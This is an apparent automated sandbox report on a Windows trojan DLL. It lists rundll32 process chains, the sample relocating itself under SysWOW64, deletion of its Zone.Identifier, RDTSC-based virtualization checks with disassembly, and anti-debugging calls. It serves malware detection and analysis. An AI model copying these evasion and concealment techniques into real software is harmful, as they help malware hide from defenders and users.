Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_006444AA	4_2_006444AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00635AB2	4_2_00635AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_006498BD	4_2_006498BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_006490BA	4_2_006490BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00637283	4_2_00637283
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00650687	4_2_00650687
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00644E8A	4_2_00644E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0064748A	4_2_0064748A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0063CC8D	4_2_0063CC8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00633C91	4_2_00633C91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0064D091	4_2_0064D091
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0063AC95	4_2_0063AC95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0064AC9B	4_2_0064AC9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0064056A	4_2_0064056A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00641F6B	4_2_00641F6B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0064577E	4_2_0064577E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00633345	4_2_00633345
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00651343	4_2_00651343
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0064F14D	4_2_0064F14D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0063C158	4_2_0063C158
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00633F5C	4_2_00633F5C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00635923	4_2_00635923
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00636B25	4_2_00636B25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0065292B	4_2_0065292B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00650B34	4_2_00650B34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00633502	4_2_00633502
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00632309	4_2_00632309
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0064FD10	4_2_0064FD10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0063251C	4_2_0063251C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_006355E8	4_2_006355E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0064BFE8	4_2_0064BFE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_006503F1	4_2_006503F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0063C5FE	4_2_0063C5FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_006525C3	4_2_006525C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00636FC4	4_2_00636FC4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0063A3DF	4_2_0063A3DF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00649DA1	4_2_00649DA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00642FA2	4_2_00642FA2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00644BAA	4_2_00644BAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0064B1B5	4_2_0064B1B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0063BFB6	4_2_0063BFB6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00647BB2	4_2_00647BB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00639384	4_2_00639384
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00644D8D	4_2_00644D8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0063758F	4_2_0063758F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00634F8E	4_2_00634F8E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0063FD91	4_2_0063FD91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0064B397	4_2_0064B397
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00651193	4_2_00651193
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0064D99A	4_2_0064D99A

Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 6E7E52A0 appears 49 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6E7E52A0 appears 49 times

Source: C:\Windows\SysWOW64\rundll32.exe

Process Stats: CPU usage > 98%

Source: tUJXpPwU27.dll

Binary or memory string: OriginalFilenameOnqeyxlcnp.dll6 vs tUJXpPwU27.dll

Source: tUJXpPwU27.dll	Virustotal: Detection: 41%
Source: tUJXpPwU27.dll	ReversingLabs: Detection: 48%

Source: tUJXpPwU27.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\tUJXpPwU27.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\tUJXpPwU27.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\tUJXpPwU27.dll,Control_RunDLL
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\tUJXpPwU27.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\tUJXpPwU27.dll,aocchppr
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\tUJXpPwU27.dll,atibsyaucowikobny
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\tUJXpPwU27.dll",Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cilqlpbnkp\gwjznuxweg.czu",ligDrVSARhbsLaD
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\tUJXpPwU27.dll",Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\tUJXpPwU27.dll",Control_RunDLL
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\tUJXpPwU27.dll",Control_RunDLL
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Cilqlpbnkp\gwjznuxweg.czu",Control_RunDLL
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\tUJXpPwU27.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\tUJXpPwU27.dll,Control_RunDLL	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\tUJXpPwU27.dll,aocchppr	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\tUJXpPwU27.dll,atibsyaucowikobny	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\tUJXpPwU27.dll",Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\tUJXpPwU27.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cilqlpbnkp\gwjznuxweg.czu",ligDrVSARhbsLaD	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\tUJXpPwU27.dll",Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\tUJXpPwU27.dll",Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\tUJXpPwU27.dll",Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Cilqlpbnkp\gwjznuxweg.czu",Control_RunDLL	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: classification engine

Classification label: mal88.troj.evad.winDLL@26/0@0/20

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E7E32C0 CoCreateInstance,

0_2_6E7E32C0

Source: C:\Windows\SysWOW64\rundll32.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\tUJXpPwU27.dll,Control_RunDLL

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E7DE200 LoadLibraryExW,LoadLibraryExW,LoadLibraryExW,FindResourceW,LoadResource,SizeofResource,MultiByteToWideChar,FreeLibrary,

0_2_6E7DE200

Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK

Source: tUJXpPwU27.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: tUJXpPwU27.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: tUJXpPwU27.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: tUJXpPwU27.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: tUJXpPwU27.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: tUJXpPwU27.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E807737 push ecx; ret	0_2_6E80774A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E7E52E6 push ecx; ret	0_2_6E7E52F9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E807737 push ecx; ret	2_2_6E80774A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E7E52E6 push ecx; ret	2_2_6E7E52F9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007B1229 push eax; retf	3_2_007B129A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00631229 push eax; retf	4_2_0063129A

Source: tUJXpPwU27.dll

Static PE information: real checksum: 0x7f301 should be: 0x82190

Source: C:\Windows\SysWOW64\rundll32.exe

PE file moved: C:\Windows\SysWOW64\Cilqlpbnkp\gwjznuxweg.czu

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

File opened: C:\Windows\SysWOW64\Cilqlpbnkp\gwjznuxweg.czu:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E7E7307 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_6E7E7307

Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 000000006E7D6482 second address: 000000006E7D64B3 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [ebp-18h], ecx 0x00000006 test edx, edx 0x00000008 jne 00007FD9E483B642h 0x0000000a mov dword ptr [ebp-20h], 09705DBFh 0x00000011 rdtscp
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 000000006E7D8047 second address: 000000006E7D805A instructions: 0x00000000 rdtscp 0x00000003 test edx, edx 0x00000005 jnbe 00007FD9E483859Eh 0x00000007 rdtscp
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 000000006E7D805A second address: 000000006E7D8047 instructions: 0x00000000 rdtscp 0x00000003 mov ecx, dword ptr [esp+0Ch] 0x00000007 ror esi, 0Dh 0x0000000a mov eax, esi 0x0000000c pop esi 0x0000000d xor ecx, esp 0x0000000f call 00007FD9E48479C1h 0x00000014 cmp ecx, dword ptr [6E81E008h] 0x0000001a jne 00007FD9E483B625h 0x0000001d ret 0x0000001f mov esp, ebp 0x00000021 pop ebp 0x00000022 ret 0x00000023 mov edx, dword ptr [ebp-24h] 0x00000026 mov edi, eax 0x00000028 jmp 00007FD9E483B691h 0x0000002a mov al, byte ptr [esi] 0x0000002c cmp al, 61h 0x0000002e movzx eax, al 0x00000031 jc 00007FD9E483B625h 0x00000033 add edi, FFFFFFE0h 0x00000036 mov ecx, dword ptr [ebp-18h] 0x00000039 add edi, eax 0x0000003b mov eax, dword ptr [ebp-50h] 0x0000003e inc esi 0x0000003f add ecx, 0000FFFFh 0x00000045 mov dword ptr [ebp-34h], edi 0x00000048 mov dword ptr [ebp-44h], esi 0x0000004b mov dword ptr [ebp-74h], esi 0x0000004e mov dword ptr [ebp-18h], ecx 0x00000051 test cx, cx 0x00000054 jne 00007FD9E483B56Fh 0x0000005a cmp eax, dword ptr [ebp-30h] 0x0000005d jl 00007FD9E483B635h 0x0000005f mov edx, 0000000Dh 0x00000064 mov ecx, edi 0x00000066 call 00007FD9E483CF8Eh 0x0000006b push ebp 0x0000006c mov ebp, esp 0x0000006e and esp, FFFFFFF8h 0x00000071 sub esp, 0Ch 0x00000074 mov eax, dword ptr [6E81E008h] 0x00000079 xor eax, esp 0x0000007b mov dword ptr [esp+08h], eax 0x0000007f push esi 0x00000080 mov esi, ecx 0x00000082 rdtscp
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 000000006E7D6482 second address: 000000006E7D64B3 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [ebp-18h], ecx 0x00000006 test edx, edx 0x00000008 jne 00007FD9E48385B2h 0x0000000a mov dword ptr [ebp-20h], 09705DBFh 0x00000011 rdtscp
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 000000006E7D8047 second address: 000000006E7D805A instructions: 0x00000000 rdtscp 0x00000003 test edx, edx 0x00000005 jnbe 00007FD9E483B62Eh 0x00000007 rdtscp
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 000000006E7D805A second address: 000000006E7D8047 instructions: 0x00000000 rdtscp 0x00000003 mov ecx, dword ptr [esp+0Ch] 0x00000007 ror esi, 0Dh 0x0000000a mov eax, esi 0x0000000c pop esi 0x0000000d xor ecx, esp 0x0000000f call 00007FD9E4844931h 0x00000014 cmp ecx, dword ptr [6E81E008h] 0x0000001a jne 00007FD9E4838595h 0x0000001d ret 0x0000001f mov esp, ebp 0x00000021 pop ebp 0x00000022 ret 0x00000023 mov edx, dword ptr [ebp-24h] 0x00000026 mov edi, eax 0x00000028 jmp 00007FD9E4838601h 0x0000002a mov al, byte ptr [esi] 0x0000002c cmp al, 61h 0x0000002e movzx eax, al 0x00000031 jc 00007FD9E4838595h 0x00000033 add edi, FFFFFFE0h 0x00000036 mov ecx, dword ptr [ebp-18h] 0x00000039 add edi, eax 0x0000003b mov eax, dword ptr [ebp-50h] 0x0000003e inc esi 0x0000003f add ecx, 0000FFFFh 0x00000045 mov dword ptr [ebp-34h], edi 0x00000048 mov dword ptr [ebp-44h], esi 0x0000004b mov dword ptr [ebp-74h], esi 0x0000004e mov dword ptr [ebp-18h], ecx 0x00000051 test cx, cx 0x00000054 jne 00007FD9E48384DFh 0x0000005a cmp eax, dword ptr [ebp-30h] 0x0000005d jl 00007FD9E48385A5h 0x0000005f mov edx, 0000000Dh 0x00000064 mov ecx, edi 0x00000066 call 00007FD9E4839EFEh 0x0000006b push ebp 0x0000006c mov ebp, esp 0x0000006e and esp, FFFFFFF8h 0x00000071 sub esp, 0Ch 0x00000074 mov eax, dword ptr [6E81E008h] 0x00000079 xor eax, esp 0x0000007b mov dword ptr [esp+08h], eax 0x0000007f push esi 0x00000080 mov esi, ecx 0x00000082 rdtscp
Source: C:\Windows\System32\loaddll32.exe	RDTSC instruction interceptor: First address: 000000006E7D6482 second address: 000000006E7D64B3 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [ebp-18h], ecx 0x00000006 test edx, edx 0x00000008 jne 00007FD9E483B642h 0x0000000a mov dword ptr [ebp-20h], 09705DBFh 0x00000011 rdtscp
Source: C:\Windows\System32\loaddll32.exe	RDTSC instruction interceptor: First address: 000000006E7D8047 second address: 000000006E7D805A instructions: 0x00000000 rdtscp 0x00000003 test edx, edx 0x00000005 jnbe 00007FD9E483859Eh 0x00000007 rdtscp
Source: C:\Windows\System32\loaddll32.exe	RDTSC instruction interceptor: First address: 000000006E7D805A second address: 000000006E7D8047 instructions: 0x00000000 rdtscp 0x00000003 mov ecx, dword ptr [esp+0Ch] 0x00000007 ror esi, 0Dh 0x0000000a mov eax, esi 0x0000000c pop esi 0x0000000d xor ecx, esp 0x0000000f call 00007FD9E48479C1h 0x00000014 cmp ecx, dword ptr [6E81E008h] 0x0000001a jne 00007FD9E483B625h 0x0000001d ret 0x0000001f mov esp, ebp 0x00000021 pop ebp 0x00000022 ret 0x00000023 mov edx, dword ptr [ebp-24h] 0x00000026 mov edi, eax 0x00000028 jmp 00007FD9E483B691h 0x0000002a mov al, byte ptr [esi] 0x0000002c cmp al, 61h 0x0000002e movzx eax, al 0x00000031 jc 00007FD9E483B625h 0x00000033 add edi, FFFFFFE0h 0x00000036 mov ecx, dword ptr [ebp-18h] 0x00000039 add edi, eax 0x0000003b mov eax, dword ptr [ebp-50h] 0x0000003e inc esi 0x0000003f add ecx, 0000FFFFh 0x00000045 mov dword ptr [ebp-34h], edi 0x00000048 mov dword ptr [ebp-44h], esi 0x0000004b mov dword ptr [ebp-74h], esi 0x0000004e mov dword ptr [ebp-18h], ecx 0x00000051 test cx, cx 0x00000054 jne 00007FD9E483B56Fh 0x0000005a cmp eax, dword ptr [ebp-30h] 0x0000005d jl 00007FD9E483B635h 0x0000005f mov edx, 0000000Dh 0x00000064 mov ecx, edi 0x00000066 call 00007FD9E483CF8Eh 0x0000006b push ebp 0x0000006c mov ebp, esp 0x0000006e and esp, FFFFFFF8h 0x00000071 sub esp, 0Ch 0x00000074 mov eax, dword ptr [6E81E008h] 0x00000079 xor eax, esp 0x0000007b mov dword ptr [esp+08h], eax 0x0000007f push esi 0x00000080 mov esi, ecx 0x00000082 rdtscp

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E7D6430 rdtscp

0_2_6E7D6430

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E7FC8C1 FindFirstFileExA,		0_2_6E7FC8C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E7FC8C1 FindFirstFileExA,		2_2_6E7FC8C1

Source: C:\Windows\SysWOW64\rundll32.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Anti Debugging:

Found potential dummy code loops (likely to delay analysis)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Process Stats: CPU usage > 90% for more than 60s

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E7E78AF IsDebuggerPresent,OutputDebugStringW,

0_2_6E7E78AF

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E7E7C71 GetProcessHeap,HeapFree,

0_2_6E7E7C71

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E7D6430 rdtscp

0_2_6E7D6430

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E7D6430 mov edi, dword ptr fs:[00000030h]	0_2_6E7D6430
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E7E7B5A mov esi, dword ptr fs:[00000030h]	0_2_6E7E7B5A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E7D6320 mov eax, dword ptr fs:[00000030h]	0_2_6E7D6320
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E7F607A mov eax, dword ptr fs:[00000030h]	0_2_6E7F607A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E7D8080 mov eax, dword ptr fs:[00000030h]	0_2_6E7D8080
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E7D6430 mov edi, dword ptr fs:[00000030h]	2_2_6E7D6430
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E7E7B5A mov esi, dword ptr fs:[00000030h]	2_2_6E7E7B5A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E7D6320 mov eax, dword ptr fs:[00000030h]	2_2_6E7D6320
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E7F607A mov eax, dword ptr fs:[00000030h]	2_2_6E7F607A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E7D8080 mov eax, dword ptr fs:[00000030h]	2_2_6E7D8080
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007CDE10 mov eax, dword ptr fs:[00000030h]	3_2_007CDE10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0064DE10 mov eax, dword ptr fs:[00000030h]	4_2_0064DE10

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E7E48F9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6E7E48F9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E7EE411 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6E7EE411
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E7E517D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6E7E517D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E7E48F9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_6E7E48F9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E7EE411 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6E7EE411
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E7E517D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6E7E517D

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\tUJXpPwU27.dll",#1

Jump to behavior

Source: rundll32.exe, 00000012.00000002.1171696447.00000000030F0000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: rundll32.exe, 00000012.00000002.1171696447.00000000030F0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000012.00000002.1171696447.00000000030F0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: rundll32.exe, 00000012.00000002.1171696447.00000000030F0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_6E804E7C
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6E7FD9CB
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6E8056E7
Source: C:\Windows\System32\loaddll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_6E8057B4
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6E7FD466
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6E8054B7
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_6E8055E0
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_6E805267
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6E8050F4
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6E80504B
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6E8051DA
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6E80513F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	2_2_6E804E7C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	2_2_6E7FD9CB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	2_2_6E8056E7
